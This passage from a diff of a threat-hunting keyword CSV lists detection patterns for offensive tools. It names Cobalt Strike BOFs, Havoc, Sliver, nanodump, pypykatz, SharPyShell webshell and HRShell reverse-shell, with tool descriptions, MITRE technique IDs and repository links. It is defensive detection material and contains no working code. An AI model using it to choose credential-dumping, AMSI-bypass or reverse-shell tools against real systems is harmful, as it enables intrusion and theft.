T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*include injection.c*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" "*include*bofmask.h*","offensive_tool_keyword","BOFMask","BOFMask is a proof-of-concept for masking Cobalt Strike's Beacon payload while executing a Beacon Object File (BOF)","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/passthehashbrowns/BOFMask","1","1","N/A","10","1","94","24","2023-06-28T14:35:32Z","2023-06-27T21:19:22Z" "*incognito* list_tokens -u*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*incognito.exe*","offensive_tool_keyword","AD exploitation cheat sheet","Token Manipulation Tokens can be impersonated from other users with a session/running processes on the machine. Most C2 frameworks have functionality for this built-in (such as the Steal Token functionality in Cobalt Strike)","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*infection_monkey.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*infection_monkey.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*info@skelsecprojects.com*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "*infoga.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*information_gathering_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39264","4347","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" +"*information_gathering_tools.py*","offensive_tool_keyword","hackingtool","ALL IN ONE Hacking Tool For Hackers","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/Z4nzu/hackingtool","1","1","N/A","N/A","10","39278","4350","2023-09-13T19:08:33Z","2020-04-11T09:21:31Z" "*infosecn1nja/SharpDoor*","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1076 - T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","1","N/A","7","3","298","64","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z" "*Initial_Access.ps1*","offensive_tool_keyword","MAAD-AF","MAAD Attack Framework - An attack tool for simple fast & effective security testing of M365 & Azure AD. ","T1078.001 - T1552.001 - T1558.001 - T1003.001 - T1110.003 - T1555.003 - T1558.002 - T1087.001 - T1087.002 - T1214.001 - T1562.001 - T1088 - T1559.001 - T1106 - T1204","TA0006 - TA0004 - TA0008 - TA0007 - TA0002 - TA0005","N/A","N/A","Network Exploitation tools","https://github.com/vectra-ai-research/MAAD-AF","1","1","N/A","N/A","3","293","43","2023-09-27T02:49:59Z","2023-02-09T02:08:07Z" "*InitialAccess_SpearphishingAttachment_FakeWordDoc.py*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" @@ -11634,63 +11787,63 @@ "*initialize_spoofed_callstack*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" "*initializeShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" "*Initializing domainDumper()*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" -"*initstring/cloud_enum*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1238","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" -"*inject 1337 /*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*initstring/cloud_enum*","offensive_tool_keyword","cloud_enum","Multi-cloud OSINT tool. Enumerate public resources in AWS Azure and Google Cloud.","T1596","TA0043","N/A","N/A","Reconnaissance","https://github.com/initstring/cloud_enum","1","1","N/A","6","10","1242","199","2023-07-31T07:27:37Z","2019-05-31T09:14:05Z" +"*inject 1337 /*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*inject shellcode*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" -"*inject.spawn*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" -"*inject.spoofaddr*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4893","746","2023-10-03T23:32:31Z","2022-09-11T13:21:16Z" +"*inject.spawn*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*inject.spoofaddr*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" "*inject_dll_reflective.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*inject_dll_srdi.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*inject_shellcode.py*","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1100 - T1059 - T1505","TA0002 - TA0003 - TA0004","N/A","N/A","Web Attacks","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","9","809","144","2023-09-27T08:48:31Z","2019-03-10T22:09:40Z" "*inject_shellcode_self*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" -"*inject-amsiBypass *","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" -"*inject-amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*inject-amsiBypass.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","362","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-amsiBypass *","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" +"*inject-amsi-bypass*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*inject-amsiBypass.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","363","67","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*inject-assembly *","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*inject-assembly.cna*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*injectassembly.x64.bin*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*injectassembly.x64.o*","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","449","75","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" -"*Inject-BypassStuff*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*InjectDll.cpp*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - 